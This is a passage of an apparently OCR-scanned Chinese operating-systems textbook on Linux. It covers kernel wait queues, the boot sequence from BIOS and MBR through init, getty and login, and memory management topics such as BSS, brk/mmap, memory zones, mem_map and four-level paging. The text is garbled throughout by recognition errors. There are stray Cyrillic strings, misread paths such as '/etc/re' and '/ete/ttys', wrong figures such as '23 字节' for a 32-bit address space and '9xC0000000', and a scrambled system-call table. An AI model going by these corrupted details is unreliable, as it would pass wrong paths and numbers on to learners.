各 种 WO 操作 或 内 核 事件 的 任务 被 放 入 另 一 个 数据 结构 当中 ， 即 等 待 从 列 。 每 一 种 任务 可 能 需要 等 待 的 
事件 对 应 了 一 个 等 待 队列 。 等 待 队列 的 头 包含 一 个 指向 任务 链表 的 指针 及 一 枚 自 旋 锁 。 为 了 保证 等 待 队 
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列 可 以 在 主 内 核 代码 、 中 断 处 理 函数 或 其 他 异步 处 理 请 求 代码 中 进行 并 发 操作 ， 自 旋 锁 是 非常 必要 的 。 

事实 上 ， 内 核 代码 在 很 多 地 方 都 含有 同步 变量 。 早 期 的 Linux 内 核 只 有 一 个 大 内 核 锁 (Big Kernel 
Lock，BKL)。 由 于 它 阻止 了 不 同 的 处 理 器 并 发 运行 内 核 代码 ， 这 使 得 内 核 的 效率 非常 低下 ， 特 别 是 在 
多 处 理 器 平台 上 。 所 以 ， 很 多 新 的 同步 点 被 更 加 细 粒 度 地 引入 了 。 


10.3.5 启动 Linux 系 统 

每 个 平台 的 细节 都 有 不 同 ， 但 是 整体 来 说 ， 下 面 的 步骤 代表 了 启动 的 过 程 。 当 计算 机 启动 时 ， 
BIOS 加 电 自 检 (POST)， 并 对 硬件 进行 检测 和 初始 化 ， 这 是 因为 操作 系统 的 启动 过 程 可 能 会 依赖 于 磁 
盘 访问 、 屏 医 、 键 盘 等 。 接 下 来 ， 启 动 磁盘 的 第 一 个 扁 区 ， 即 主 引 导 记录 (MBR)， 被 读 入 到 一 个 固定 
的 内 存 区 域 并 且 执行 。 这 个 分 区 中 含有 一 个 很 小 的 程序 (只 有 512 字 节 )， 这 个 程序 从 启动 设备 中 ， 通 党 
是 IDE 或 SCSI 磁 盘 ， 调 入 一 个 名 为 boot 的 独立 程序 。boot 程 序 将 自身 复制 到 高 地 址 的 内 存 当中 从 而 为 操 
作 系 统 释放 低地 址 的 内 存 。 

复制 完成 后 ，boot 程 序 读 取 启 动 设备 的 根 目录 。 为 了 达到 这 个 目的 ，boot 程 序 必须 能 够 理解 文件 系 
统 和 目录 格式 ， 这 个 工作 通常 由 引导 程序 ， 如 GRUB (多 系统 启动 管理 器 ) ， 来 完成 。 其 他 流行 的 引导 
程序 ， 如 Intel 的 LILO， 不 依赖 于 任何 特定 的 文件 系统 。 相 反 ， 他 们 需要 一 个 块 映射 图 和 低层 地 址 ， 他 们 
描述 了 物理 遍 区 、 磁 头 和 磁道 ， 可 以 帮助 找到 相应 的 需要 被 加 载 的 扇 区 。 

然后 ，boot 程 序 读 人 操作 系统 内 核 ， 并 把 控制 交 给 内 核 。 从 这 里 开始 ，boot 程 序 完成 了 它 的 任务 ， 
系统 内 核 开 始 运行 。 

内 核 的 开始 代码 是 用 汇编 语言 写成 的 ， 具 有 较 高 的 机 器 依赖 性 。 主 要 的 工作 包括 创建 内 核 堆栈 、 识 
别 CPU 类 型 、 计 算 可 用 内 存 、 禁 用 中 断 、 启 用 内 存 管理 单元 ， 最 后 调用 C 语 言 写成 的 main 函 数 开始 执行 
操作 系统 的 主要 部 分 。 

C 语 言 代码 也 有 相当 多 的 初始 化 工作 要 做 ， 但 是 这 些 工作 更 逻辑 化 (而 不 是 物理 化 )。C 语 言 代 码 开 
始 的 时 候 会 分 配 一 个 消息 缓冲 区 来 帮助 调试 启动 出 现 的 问题 。 随 着 初始 化 工作 的 进行 ， 信息 被 写 入 消息 
缓冲 区 ， 这 些 信息 与 当前 正在 发 生 的 事件 相关 ， 所 以 ， 如 果 出 现 启动 失败 的 情况 ， 这 些 信息 可 以 通过 一 
个 特殊 的 诊断 程序 调 出 来 。 我 们 可 以 把 它 当 作 是 操作 系统 的 “飞行 信息 记录 器 ” (MERRET, W 
员 寻 找 的 黑 盒 子 ) 。 

接 下 来 ， 内 核 数据 结构 得 到 分 配 。 大 部 分 内 核 数据 结构 的 大 小 是 固定 的 ， 但 是 一 少 部 分 ， 如 页 面 组 
存 和 特殊 的 页 表 结构 ， 依 赖 于 可 用 内 存 的 大 小 。 

从 这 里 开始 ， 系 统 进行 自动 配置 。 使 用 描述 何 种 设备 可 能 存在 配置 文件 ， 系统 开始 探测 哪些 设备 是 
确实 存在 的 。 如 果 一 个 被 探测 的 设备 给 出 了 响应 ， 这 个 设备 就 会 被 加 入 到 已 连接 设备 表 中 。 如 果 它 没有 
响应 ， 就 假设 它 未 连接 或 直接 忽略 掉 它 。 不 同 于 传统 的 UNIX 版 本 ， Linux 系 统 的 设备 驱动 程序 不 需要 静 
态 链接 ， 它 们 可 以 被 动态 加 载 (就 像 所 有 的 MS-DOS 和 Windows 版 本 一 样 ) 。 

关于 支持 和 反对 动态 加 载 驱动 程序 的 争论 非常 有 趣 ， 值 得 简要 地 阐述 一 下 。 动态 加 载 的 主要 论点 是 
同样 的 二 进 制 文件 可 以 分 发 给 具有 不 同系 统 配置 的 用 户 ， 这 个 二 进 制 文 件 可 以 自动 加 载 它 所 需要 的 驱动 
程序 ， 甚 至 可 以 通过 网 络 加 载 。 反 对 动态 加 载 的 主要 论点 是 安全 。 如 果 你 正在 一 个 安全 的 环境 中 运行 计 
算 机 ， 比 如 说 银行 的 数据 库 系统 或 者 公司 的 网 络 服务 器 ， 你 肯定 不 希望 其 他 人 向 内 核 中 插入 随机 代码 。 
系统 管理 员 可 以 在 一 个 安全 的 机 器 上 保存 系统 的 源 文件 和 目标 文件 ， 在 这 台 机 器 上 完成 系统 的 编译 链接 ， 
然后 通过 局 域 网 把 内 核 的 二 进 制 文件 分 发 给 其 他 的 机 器 。 如 果 驱 动 程序 不 能 被 动态 加 载 ， 这 就 阻止 了 那 
些 知道 超级 用 户 密码 的 计算 机 使 用 者 或 其 他 人 向 系统 内 核 注 入 恶意 或 漏洞 代码 。 而 且 ， 在 大 的 站 点 中 ， 
系统 编译 链接 的 时 候 硬件 配置 都 是 已 知 的 。 需 要 重新 链接 系统 的 变化 非常 罕见 ， 即使 是 在 系统 中 添加 一 
个 硬件 设备 也 不 是 问题 。 

- 且 所 有 的 硬件 都 配置 好 了 ， 接 下 来 要 做 的 事情 就 是 细心 地 手动 运行 进程 0， 建 立 它 的 堆栈 ， 运行 
它 。 进程 0 继续 进行 初始 化 ， 做 如 下 的 工作 : 配置 实时 时 钟 ， 挂 载 根 文 件 系统 ， 创建 init 进 程 (进程 1) 
和 页 面 守护 进程 (进程 2) 。 

init 进 程 检测 它 的 标志 以 确定 它 应 该 为 单 用 户 还 是 多 用 户 服务 。 前 一 种 情况 ， 它 调用 fork 函 数 创建 一 
个 shell 进 程 ， 并 且 等 待 这 个 进程 结束 。 后 一 种 情况 ， 它 调用 fork 函 数 创建 一 个 运行 系统 初始 化 shell 脚 本 
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( 即 /etc/re) 的 进程 ， 这 个 进程 可 以 进行 文件 系统 一 致 性 检测 、 挂 载 附加 文件 系统 、 开 启 守护 进程 等 。 然 
后 这 个 进程 从 /etc/ttys 中 读 取 数据 ， 其 中 /ete/ttys 列 出 了 所 有 的 终端 和 它们 的 属性 。 对 于 每 一 个 启用 的 终 
端 ， 这 个 进程 调用 fork 函 数 创建 一 个 自身 的 副本 ， 进 行内 部 处 理 并 运行 一 个 名 为 getty 的 程序 。 

8etty 程 序 设 置 行 速率 以 及 其 他 的 行 属性 (比如 ， 有 一 些 可 能 是 调制 解 调 器 )， 然 后 在 终端 的 屏幕 上 
юш: 

login: 
等 待 用 户 从 键盘 键入 用 户 名 。 当 有 人 举 在 终端 前 ， 提 供 了 一 个 用 户 名 后 ，getty 程 序 就 结束 了 ， 登录 程序 
/bin/login 开 始 运行 。login 程 序 要 求 输入 密码 ， 给 密码 加 密 ， 并 与 保存 在 密码 文件 /etc/passwd 中 的 加 密 密 
码 进行 对 比 。 如 果 是 正确 的 ，login 程 序 以 用 户 shell 程 序 替换 自身 ， 等 待 第 一 个 命令 。 如 果 是 不 正确 的 ， 
login 程 序 要 求 输入 另 一 个 用 户 名 。 这 种 机 制 如 图 10-11 所 示 ， 访 系统 具有 三 个 终端 。 


终端 1 


Password: 


图 10-11 用 于 启动 一 些 Linux 系 统 的 进程 顺序 


在 图 中 ，0 号 终端 上 运行 的 getty 程 序 仍然 在 等 待 用 户 输入 。1 号 终端 上 ， 用 户 已 经 键 人 了 登录 名 ， 所 
以 getty 程 序 已 经 用 login 程 序 替换 掉 自身 ， 目 前 正在 等 待 用 户 输入 密码 。2 号 终端 上 ， 用 户 已 经 成 功 登 录 ， 
shell 程 序 显示 提示 符 (%)。 然 后 用 户 输入 

cp f1 f2 
shell 程 序 将 调用 fork 函 数 创建 一 个 子 进程 ， 并 使 这 个 子 进程 运行 cp 程序 。 然后 shell 程 序 被 阻塞 ， 等 待 子 
进程 结束 ， 子 进程 结束 之 后 ，shell 程 序 会 显示 新 的 提示 符 并 且 读 取 键盘 输入 。 如 果 2 号 终端 的 用 户 不 是 
键入 了 cp 命令 而 是 cc 命令 ，C 语 言 编译 器 的 主 程序 就 会 被 启动 ， 这 将 生成 更 多 的 子 进程 来 运行 不 同 的 编 
译 过 程 。 
10.4 Linux 中 的 内 存 管理 

Linux 的 内 存 模型 简单 明了 ， 这 样 使 得 程序 可 移植 并 且 能 够 在 内 存 管理 单元 大 不 相同 的 机 器 上 实现 
Linux， 比 如 : 从 没有 内 存 管理 单元 的 机 器 (如 ， 原 始 的 IBM РС) 到 有 复杂 分 页 硬件 支持 的 机 器 。 这 一 
块 设计 领域 在 过 去 数 十 年 几乎 没有 发 生 改变 。 下 面 要 介绍 该 模型 以 及 它 是 如 何 实现 的 。 


10.4.1 基本 概念 

每 个 Linux 进 程 都 有 一 个 地 址 空间 ， 逻 辑 上 有 三 段 组 成 ， 代码 、 数 据 和 堆栈 段 。 图 10-12a 中 的 进程 A 
就 给 出 了 一 个 进程 空间 的 例子 。 代 码 段 包含 了 形成 程序 可 执行 代码 的 机 器 指令 。 它 是 由 编译 器 和 汇编 器 
把 C、C++ 或 者 其 他 程序 源码 转换 成 机 器 代码 而 产生 的 。 通 常 ， 代码 段 是 只 读 的 。 由 于 难以 理解 和 调试 ， 
自修 改 程序 早 在 大 约 1950 年 就 不 再 时 兴 了 。 因 此 ， 代 码 段 既 不 增长 也 不 减少 ， 总 之 不 会 发 生 改 变 。 
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图 10-12 а) 进程 A 的 虚拟 地 址 空间 ，b) 物理 内 存 ，c) 进程 B 的 虚拟 地 址 空间 


数据 段 包含 了 所 有 程序 变量 、 字 符 串 、 数 字 和 其 他 数据 的 存储 。 它 有 两 部 分 ， 初 始 化 数据 和 未 初始 
化 数据 。 由 于 历史 的 原因 ， 后 者 就 是 我 们 所 知道 的 BSS (历史 上 称 作 符号 起 始 块 )。 数 据 段 的 初始 化 部 
分 包括 编译 器 常量 和 那些 在 程序 启动 时 就 需要 一 个 初始 值 的 变量 。 所 有 BSS 部 分 中 的 变量 在 加 载 后 被 初 
始 化 为 0。 

例如 ， 在 C 语 言 中 可 以 在 声明 一 个 字符 串 的 同时 初始 化 它 。 当 程序 启动 的 时 候 ， 字 符 串 要 拥有 其 初 
始 值 。 为 了 实现 这 种 构造 ， 编 译 器 在 地 址 空间 给 字符 串 分 配 一 个 位 置 ， 同 时 保证 在 程序 启动 的 时 候 该 位 
置 包含 了 合适 的 字符 串 。 从 操作 系统 的 角度 来 看 ， 初 始 化 数据 跟 程序 代码 并 没有 什么 不 同 二 者 都 包 
含 了 由 编译 器 产 出 的 位 串 ， 它 们 必须 在 程序 启动 的 时 候 加 载 到 内 存 。 

未 初始 化 数据 的 存在 实际 上 仅仅 是 个 优化 。 如 果 一 个 全 局 变量 未 显 式 地 初始 化 ， 那 么 C 语 言 的 语义 说 
明 它 的 初始 值 是 0。 实 际 上 ， 大 部 分 全 局 变量 并 没有 显 式 初始 化 ， 因 此 都 是 0。 这 些 可 以 简单 地 通过 设置 
可 执行 文件 的 一 个 段 来 实现 ， 其 大 小 刚好 等 于 数据 所 需 的 字 节 数 ， 同 时 初始 化 包括 缺 省 值 为 零 的 所 有 量 。 

然而 ， 为 了 节省 可 执行 文件 的 空间 ， 并 没有 这 样 做 。 取 而 代 之 的 是 ， 文 件 包含 所 有 显 式 初始 化 的 变 
基 ， 跟 随 在 程序 代码 之 后 。 那 些 未 初始 化 的 变量 都 被 收集 在 初始 化 数据 之 后 ， 因 此 编译 器 要 做 的 就 是 在 
文件 头 部 放 入 一 个 字段 说 明 要 分 配 的 字 节 数 。 

为 了 清楚 地 说 明 这 一 点 ， 再 考虑 图 10-12a。 这 里 代码 段 的 大 小 是 8KB， 初 始 化 数据 段 的 大 小 也 是 
8KB。 未 初始 化 数据 (BSS) 是 4KB。 可 执行 文件 仅 有 16KB (代码 + 初始 化 数据 )， 加 上 一 个 很 短 的 头 
部 来 告诉 系统 在 初始 化 数据 后 另外 再 分 配 4KB ， 同 时 在 程序 启动 之 前 把 它们 初始 化 为 0。 这 个 技巧 避免 
了 在 可 执行 文件 中 存储 4KB 的 0。 

为 了 避免 分 配 一 个 全 是 0 的 物理 页 框 ， 在 初始 化 的 时 候 ，Linux 就 分 配 了 一 个 静态 零 页 面 ， 即 -个 全 
0 的 写 保护 页 面 。 当 加 载 程序 的 时 候 ， 未 初始 化 数据 区 域 被 设置 为 指向 该 零 页 面 。 当 一 个 进程 真正 要 写 
这 个 区 域 的 时 候 ， 写 时 复制 的 机 制 就 开始 起 作用 ， 一 个 实际 的 页 框 被 分 配给 该 进程。 

跟 代码 段 不 一 样 ， 数 据 段 可 以 改变 。 程 序 总 是 修改 它 的 变量 。 而 且 ， 许 多 程序 需要 在 执行 时 动态 分 
配 空间 。Linux 允 许 数据 段 随 着 内 存 的 分 配 和 回收 而 增长 和 缩减， 通过 这 种 机 制 来 解决 动态 分 配 的 问题 。 
有 一 个 系统 调用 brk， 允 许 程序 设置 其 数据 段 的 大 小 。 那 么 ， 为 了 分 配 更 多 的 内 存 ， 一 个 程序 可 以 增加 
数据 段 的 大 小 。C 库 函数 malloc 通 常 被 用 来 分 配 内 存 ， 它 就 大 量 使 用 这 个 系统 调用 。 进程 地 址 空间 描述 
符 包含 信息 ， 进 程 动态 分 配 的 内 存 区 域 (通常 叫做 堆 ，heap) 的 范围。 

第 三 段 是 栈 及 。 在 大 多 数 机 器 里 ， 它 从 虚拟 地 址 空间 的 顶部 或 者 附近 开始 ， 并 且 向 下 生长 。 例 如 ， 
在 32 位 x86 平 台 上 ， 栈 的 起 始 地 址 是 0xC0000000， 这 是 在 用 户 态 下 对 进程 可 见 的 3GB 虚 拟 地 址 限制 。 如 
果 栈 生长 到 了 栈 段 的 底部 以 下 ， 就 会 产 出 一 个 硬件 错误 同时 操作 系统 把 栈 段 的 底部 降低 一 个 页 面 。 程 序 
并 不 显 式 地 控制 栈 段 的 大 小 。 
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当 一 个 程序 启动 的 时 候 ， 它 的 栈 并 不 是 空 的 。 相 反 ， 它 包含 了 所 有 的 环境 变量 以 及 为 了 调用 它 而 向 
shell 输 入 的 命令 行 。 这 样 ， 一 个 程序 就 可 以 发 现 它 的 参数 了 。 比 如 ， 当 输入 以 下 命令 
cp src dest 


时 ，cp 程 序 运行 ， 并 且 栈 上 有 字符 申 “cp sre dest"， 这 样 程序 就 可 以 找到 源 文件 和 目标 文件 的 名 字 。 这 
些 字符 串 被 表示 为 一 个 指针 数组 来 指向 字符 串 中 的 符号 ， 使 得 解析 更 加 容易 。 

当 两 个 用 户 运行 同样 的 程序 ， 比 如 编辑 器 ， 可 以 在 内 存 中 立刻 保持 该 编辑 器 程序 代码 的 两 个 副本 ， 
但 是 并 不 高 效 。 相 反 地 ， 大 多 数 Linux 系 统 支持 共享 代码 段 。 在 图 10-12a 和 图 10-12c 中 ， 可 以 看 到 两 个 进 
程 A 和 B 拥 有 相同 的 代码 段 。 在 图 10-12b 中 可 以 看 到 物理 内 存 的 一 种 可 能 布局 ， 其 中 两 个 进程 共享 了 同 
样 的 代码 片段 。 这 种 映射 是 通过 虚拟 内 存 硬件 来 实现 的 。 

数据 段 和 栈 段 从 来 不 共享 ， 除 非 是 在 一 个 fork 之 后 ， 并 且 仅仅 是 那些 没有 被 修改 的 页 面 。 如 果 二 者 
之 一 要 增长 但 是 没有 邻近 的 空间 来 增长 ， 这 并 不 会 产生 问题 ， 因 为 在 虚拟 地 址 空间 中 邻近 的 页 面 并 不 一 
定 要 映射 到 邻近 的 物理 页 面 上 。 

在 有 些 计算 机 上 ， 硬 件 支持 指令 和 数据 拥有 不 同 的 地 址 空间 。 如 果 有 这 个 特性 ，Linux 就 可 以 利用 
E. 例如， 在 一 个 32 位 地 址 的 计算 机 上 如 果 有 这 个 特性 ， 那 么 就 有 23 字 节 的 指令 地 址 空间 和 22 字 节 的 数 
据 地 址 空间 。 一 个 到 0 的 跳 转 指令 跳 和 到 代码 段 的 地 址 0， 而 一 个 从 0 的 移动 使 用 数据 空间 的 地 址 0。 这 使 
得 可 用 的 数据 空间 加 倍 。 

除了 动态 分 配 更 多 的 内 存 ，Linux 中 的 进程 可 以 通过 内 存 映 射 文件 来 访问 文件 数据 。 这 个 特性 使 我 
们 可 以 把 一 个 文件 映射 到 进程 空间 的 一 部 分 而 该 文件 就 可 以 像 位 于 内 存 中 的 字 节 数组 一 样 被 读 写 。 把 一 
个 文件 映射 进来 使 得 随机 读 写 比 使 用 read 和 write 之 类 的 IO 系 统 调用 要 容易 的 多 。 共 享 库 的 访问 就 是 用 
这 种 机 制 映射 进来 后 进行 的 。 在 图 10-13 中 ， 我 们 可 以 看 到 一 个 文件 被 同时 映射 到 两 个 进程 中 ， 但 在 不 
同 的 虚拟 地 址 上 。 

把 一 个 文件 映射 进来 的 一 个 附加 的 好 处 是 两 个 或 者 更 多 的 进程 可 以 同时 映射 相同 的 文件 。 其 中 一 个 
进程 对 文件 的 写 可 以 被 其 他 进程 马上 看 到 。 实 际 上 ， 通 过 映射 一 个 临时 文件 (所 有 的 进程 退出 之 后 就 被 
Ж), ， 这 种 机 制 可 以 为 多 进程 共享 内 存 提供 高 带宽 。 在 最 极限 的 情况 下 ， 两 个 (或 者 更 多 ) 进程 可 以 
映射 一 个 文件 覆盖 整个 地 址 空间 ， 从 而 提供 了 一 种 介 于 进程 之 间 和 线程 之 间 的 共享 方式 。 这 样 地 址 空间 
是 共享 的 (类 似 于 线程 )， 但 是 每 个 进程 维护 其 自身 的 打开 文件 和 信号 ， 这 些 不 同 于 线程 。 实 际 上 ， 从 
来 没有 做 过 让 两 个 地 址 空间 完全 相同 的 事情 。 
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图 10-13 两 个 进程 可 以 共享 一 个 映射 文件 
10.4.2 Linux 中 的 内 存 管理 系统 调用 


POSIX 没 有 给 内 存 管理 指定 任何 系统 调用 。 这 个 主题 被 认为 是 太 依赖 于 机 器 而 不 便于 标准 化 。 可 是 ， 
这 个 问题 通过 这 样 的 说 法 被 隐藏 起 来 了 : 那些 需要 动态 内 存 管理 的 程序 可 以 使 用 malloc 库 函数 (由 ANSI 
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C 标 准 定义 )。 那 么 malloc 是 如 何 实现 的 就 被 推 到 了 POSIX 标 准 之 外 了 。 在 一 些 圈子 里 ， 这 种 方法 被 认为 
是 推卸 责任 。 

实际 上 ， 许 多 Linux 系 统 有 管理 内 存 的 系统 调用 。 最 常见 的 列 在 了 图 10-14 中 。brk 通 过 给 出 数据 段 之 外 
的 第 一 个 字 节 地 址 来 指定 数据 段 的 “ 广 一 - 


| 系统 调用 | жш ж 
大 小 。 如 果 新 值 比 原来 的 要 大 ， 那 Кык (айат) | 改变 数据 段 大 小 
么 数据 段 变 大 ， 反 之 ， 数 据 段 缩减 。 а=ттар (addr,len,prot.flags,fd,offset) | 映射 文件 зы 
mmap 和 munmap 系 统 调用 控 [5=unmap (addrien) 取消 映射 文件 J 


制 内 存 映 射 文件 。mmap 的 第 一 个 Е 
参数 ，addr， 决 定 文件 被 映射 的 地 010-14 跟 内 存 管理 相关 的 一 些 系统 调用 。 若 遇 到 错误 则 返回 码 8 
址 。 它 必须 是 页 大 小 的 倍数 。 如 果 ”为 1，a 和 addr 是 内 存 地 址 ，len 是 长 度 ，prot 是 控制 保护 ，flags 是 
这 个 参数 是 0， 系 统 确定 地 址 并 且 混杂 位 串 ， 纪 是 文件 描述 符 ，offset 是 文件 偏 移 
返回 到 a 中 。 第 二 个 参数 len 指 示 要 
映射 的 字 节 数 。 它 也 必须 是 页 大 小 的 整数 倍 。 第 三 个 参数 ，prot， 确 定 对 映射 文件 的 保护 。 它 可 以 标记 
为 可 读 、 可 写 、 可 执行 或 者 三 者 的 组 合 。 第 四 个 参数 ，flags， 控制 文件 是 私有 的 还 是 共享 的 以 及 addr 是 
一 个 需求 还 是 仅仅 是 一 个 提示 。 第 五 个 参数 ，fd， 是 要 映射 的 文件 的 描述 符 。 只 有 打开 的 文件 是 可 以 被 
映射 的 ， 因 此 为 了 映射 一 个 文件 ， 首 先 必须 要 打开 它 。 最 后 ， offset 告 诉 从 文件 中 的 什么 位 置 开始 映射 。 
并 不 一 定 要 从 第 0 个 字 节 开始 映射 ， 任 何 页 面 边界 都 是 可 以 的 。 

另 一 个 调用 ，unmap， 移 除 一 个 被 映射 的 文件 。 如 果 仅 仅 是 文件 的 一 部 分 撤销 映射 ， 那么 其 他 部 分 
仍然 保持 映射 。 


10.4.3 Linux 中 内 存 管 理 的 实现 

32 位 机 器 上 的 每 个 Linux 进 程 通常 有 3GB 的 虚拟 地 址 空间 ， 还 有 1GB 留 给 其 页 表 和 其 他 内 核 数据 。 
在 用 户 态 下 运行 时 ， 内 核 的 1GB 是 不 可 见 的 ， 但 是 当 进 程 陷入 到 内 核 时 是 可 以 访问 的 。 内 核 内 存 通常 驻 
留 在 低 端 物 理 内存 中 ， 但 是 被 映射 到 每 个 进程 虚拟 地 址 空间 顶部 的 1GB 中 ， 在 地 址 9xC0000000 和 
0xFFFFFFFF (3~4GB) 之 间 。 当 进程 创建 的 时 候 ， 进 程 地 址 空间 被 创建 ， 并 且 当 发 生 一 个 exec 系 统 调 
用 时 被 重 写 。 

为 了 允许 多 个 进程 共享 物理 内 存 ，Linux 监 视 物理 内 存 的 使 用 ， 在 用 户 进程 或 者 内 核 构 件 需要 时 分 
配 更 多 的 内 存 ， 把 物理 内 存 动态 映射 到 不 同 进程 的 地 址 空间 中 去 ， 把 程序 的 可 执行 体 、 文件 和 其 他 状态 
信息 移 人 移出 内 存 来 高 效 地 利用 平台 资源 并 且 保障 程序 执行 的 进展 性 。 本 章 的 剩余 部 分 描述 了 在 Linux 
内 核 中 负责 这 些 操作 的 各 种 机 制 的 实现 。 

1. 物理 内 存 管理 

在 许多 系统 中 由 于 异 构 硬件 限制 ， 并 不 是 所 有 的 物理 内 存 都 能 被 相同 地 对 待 ， 尤其 是 对 于 IO 和 虚 
拟 内 存 。Linux 区 分 三 种 内 存 区 域 (zone): 

1) ZONE_DMA: 可 以 用 来 DMA 操 作 的 页 。 

2) ZONE_NORMAL : 正常 规则 映射 的 页 。 

3) ZONE_HIGHMEM: 高 内 存 地 址 的 页 ， 并 不 永久 性 映射 。 

内 存 区 域 的 确切 边界 和 布局 是 硬件 体系 结构 相关 的 。 在 x86 硬 件 上 ， 一 些 设备 只 能 在 起 始 的 16MB 地 
址 空间 进行 DMA 操 作 ， 因 此 ZONE_DMA 就 在 0 一 16MB 的 范围 内 。 此 外 ， 硬件 也 不 能 直接 映射 896MB 以 
上 的 内 存 地 址 ， 因 此 ZONE_HIGHMEM 就 是 高 于 该 标记 的 任何 地 址 。ZONE_NORMAL 是 介 于 其 中 的 任 
何 地 址 。 因 此 在 x86 平 台 上 ，Linux 地 址 空间 的 起 始 896MB 是 直接 映射 的 ， 而 内 核 地 址 空间 的 剩余 128MB 
是 用 来 访问 高 地 址 内 存 区 域 的 。 内 核 为 每 个 内 存 区 域 维护 一 个 zone 数据 结构 ， 并 且 可 以 分 别 在 三 个 区 域 
上 执行 内 存 分 配 。 

Linux 的 内 存 由 三 部 分 组 成 。 前 两 部 分 是 内 核 和 内 存 映射 ， 被 “ 钉 ” 在 内 存 中 (页 面 从 来 不 换 出 ) 。 
内 存 的 其 他 部 分 被 划分 成 页 框 ， 每 一 个 页 框 都 可 以 包含 一 个 代码 、 数 据 或 者 栈 页 面 ， 一 个 页 表 页 面 ， 或 
者 在 空闲 列表 中 。 

内 核 维护 内 存 的 一 个 映射 ， 该 映射 包含 了 所 有 系统 物理 内 存 使 用 情况 的 信息 ， 比如 区 域 、 空 闲 页 框 。 
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等 。 如 图 10-15， 这 些 信息 是 如 下 组 织 的 。 

首先 ，Linux 维 护 一 个 页 描述 符 数 组 ， 称 为 mem_map， 其 中 页 描述 符 是 page 类 型 的 ， 而 且 系统 当中 
的 每 个 物理 页 框 都 有 一 个 页 描述 符 。 每 个 页 描述 符 都 有 个 指针 ,在 页 面 非 空闲 时 指向 它 所 属 的 地 址 空间 ， 
另 有 一 对 指针 可 以 使 得 它 跟 其 他 描述 符 形成 双向 链表 ， 来 记录 所 有 的 空闲 页 框 和 一 些 其 他 的 域 。 在 图 
10-15 中 ， 页 面 150 的 页 描述 符 包含 一 个 到 其 所 属地 址 空间 的 映射 。 页 面 70、 页 面 80、 页 面 200 是 空闲 的 ， 
它们 是 被 链接 在 一 起 的 。 页 描述 符 的 大 小 是 32 字 节 ， 因 此 整个 mem_map 消 耗 了 不 到 1% 的 物理 内 存 
(对 于 4KB 的 页 框 )。 

因为 物理 内 存 被 分 成 区 域 ， 所 以 Linux 为 每 个 区 域 维护 一 个 区 域 描 述 符 。 区 域 描述 符 包 含 了 每 个 区 
域 中 内 存 利用 情况 的 信息 ， 例 如 活动 和 非 活动 页 的 数目 ， 页 面 置换 算法 (本章 后 面 介 绍 ) 所 使 用 的 高 低 
水 位 ， 还 有 许多 其 他 的 域 。 

此 外 ， 区 域 描述 符 包含 一 个 空间 区 数组 。 该 数组 中 的 第 个 元 素 标记 了 2' 个 空 闪 页 的 第 一 个 块 的 第 一 个 
页 描述 符 。 既 然 可 能 有 多 块 2 个 空闲 页 ， Linux 使 用 页 描述 符 的 指针 对 把 这 些 页 面 链接 起 来 。 这 个 信息 在 
Linux 的 内 存 分 配 操作 中 使 用 。 在 图 10-15 中 ， free_areal0] 标 记 所 有 仅 由 一 个 页 框 组 成 的 物理 内 存 空闲 区 ， 
现在 指向 页 面 70， 三 个 空闲 区 当中 的 第 一 个 。 其 他 大 小 为 一 个 页 面 的 空闲 块 也 可 通过 页 描述 符 中 的 链 到 达 。 


Mem_map: 页 描述 符 数组 
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图 10-15 Linux 内 存 表示 


最 后 ，Linux 可 以 移植 到 NUMA 体 系 结构 不同 的 内 存 地 址 有 不 同 的 访问 时 间 )， 为 了 区 分 不 同 节点 
上 的 物理 内 存 (同时 避免 跨 节 点 分 配 数据 结构 )， 使 用 了 一 个 节点 描述 符 。 每 个 节点 描述 符 包 含 了 内 存 
使 用 的 信息 和 该 节点 上 的 区 域 。 在 UMA 平 台 上 ， Linux 用 一 个 节点 描述 符 描述 所 有 的 内 存 。 每 个 页 描述 
符 的 最 初 一 些 位 是 用 来 指定 该 页 框 所 属 的 节点 和 区 域 的 。 

为 了 使 分 页 机 制 在 32 位 和 64 位 体系 结构 下 高 效 工作 ，Linux 采 用 了 一 个 四 级 分 页 策略 。 这 是 一 种 最 
初 在 Alpha 系 统 中 使 用 的 三 级 分 页 策略 ， 在 Linux 2.6.10 之 后 加 以 扩展 ， 并 且 从 2.6.11 版 本 以 后 使 用 的 一 
个 四 级 分 页 策略 。 每 个 虚拟 地 址 划分 成 五 个 域 ， 如 图 10-16。 目录 域 是 页 目录 的 索引 ， 每 个 进程 都 有 一 
个 私有 的 页 目录 。 找 到 的 值 是 指向 其 中 一 个 下 一 级 目录 的 一 个 指针 ， 该 目录 也 由 虚拟 地 址 的 一 个 域 索引 。 
中 级 页 目录 表 中 的 表 项 指向 最 终 的 页 表 ， 它 是 由 虚拟 地 址 的 页 表 域 索 引 的 。 页 表 的 表 项 指向 所 需要 的 页 
面 。 在 Pentium 处 理 器 (使 用 两 级 分 页 ) E, 每 个 页 的 上 级 和 中 级 目录 仅 有 一 个 表 项 ， 因 此 总 目录 项 就 
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可 以 有 效 地 选择 要 使 用 的 页 表 。 类 似 地 ， 在 需要 的 时 候 可 以 使 用 三 级 分 页 ， 此 时 把 上 级 目录 域 的 大 小 设 
置 为 0 就 可 以 了 。 
页 面 


全 局 页 目录 上 级 页 目录 中 间 页 目录 页 表 


N 


全 局 目录 上 级 目录 | tank | 页 而 偏 移 | 虚 所 地址 


图 10-16 Linux 使 用 四 级 页 表 


物理 内 存 可 以 用 于 多 种 目的 。 内 核 自身 是 完全 “ 硬 连 线 ” 的 ， 它 的 任何 一 部 分 都 不 会 换 出 。 内 存 的 
其 余部 分 可 以 作为 用 户 页 面 、 分 页 缓存 和 其 他 目的 。 页 面 缓存 包含 最 近 已 读 的 或 者 由 于 未 来 有 可 能 使 用 
而 预 读 的 文件 块 ， 或 者 需要 写 回 磁盘 的 文件 块 页 面 ， 例 如 那些 被 换 出 到 磁盘 的 用 户 进程 创建 的 页 面 。 分 
页 缓存 并 不 是 一 个 独立 的 缓存 ， 而 是 那些 不 再 需要 的 或 者 等 待 换 出 的 用 户 页 面 集合 。 如 果 分 页 缓存 当中 
的 一 个 页 面 在 被 换 出 内 存 之 前 复 用 ， 它 可 以 被 快速 收回 。 

此 外 ，Linux 支 持 动态 加 载 模块 ， 最 常见 的 是 设备 驱动 。 它 们 可 以 是 任意 大 小 的 并 且 必 须 分 配 一 个 
连续 的 内 核 内 存 。 这 些 需求 的 一 个 直接 结果 是 ，Linux 用 这 样 一 种 方式 来 管理 物理 内 存 使 得 它 可 以 随意 
分 配 任意 大 小 的 内 存 片 。 它 使 用 的 算法 就 是 伙伴 算法 ， 下 面 给 予 描述 。 

2. 内 存 分 配 机 制 

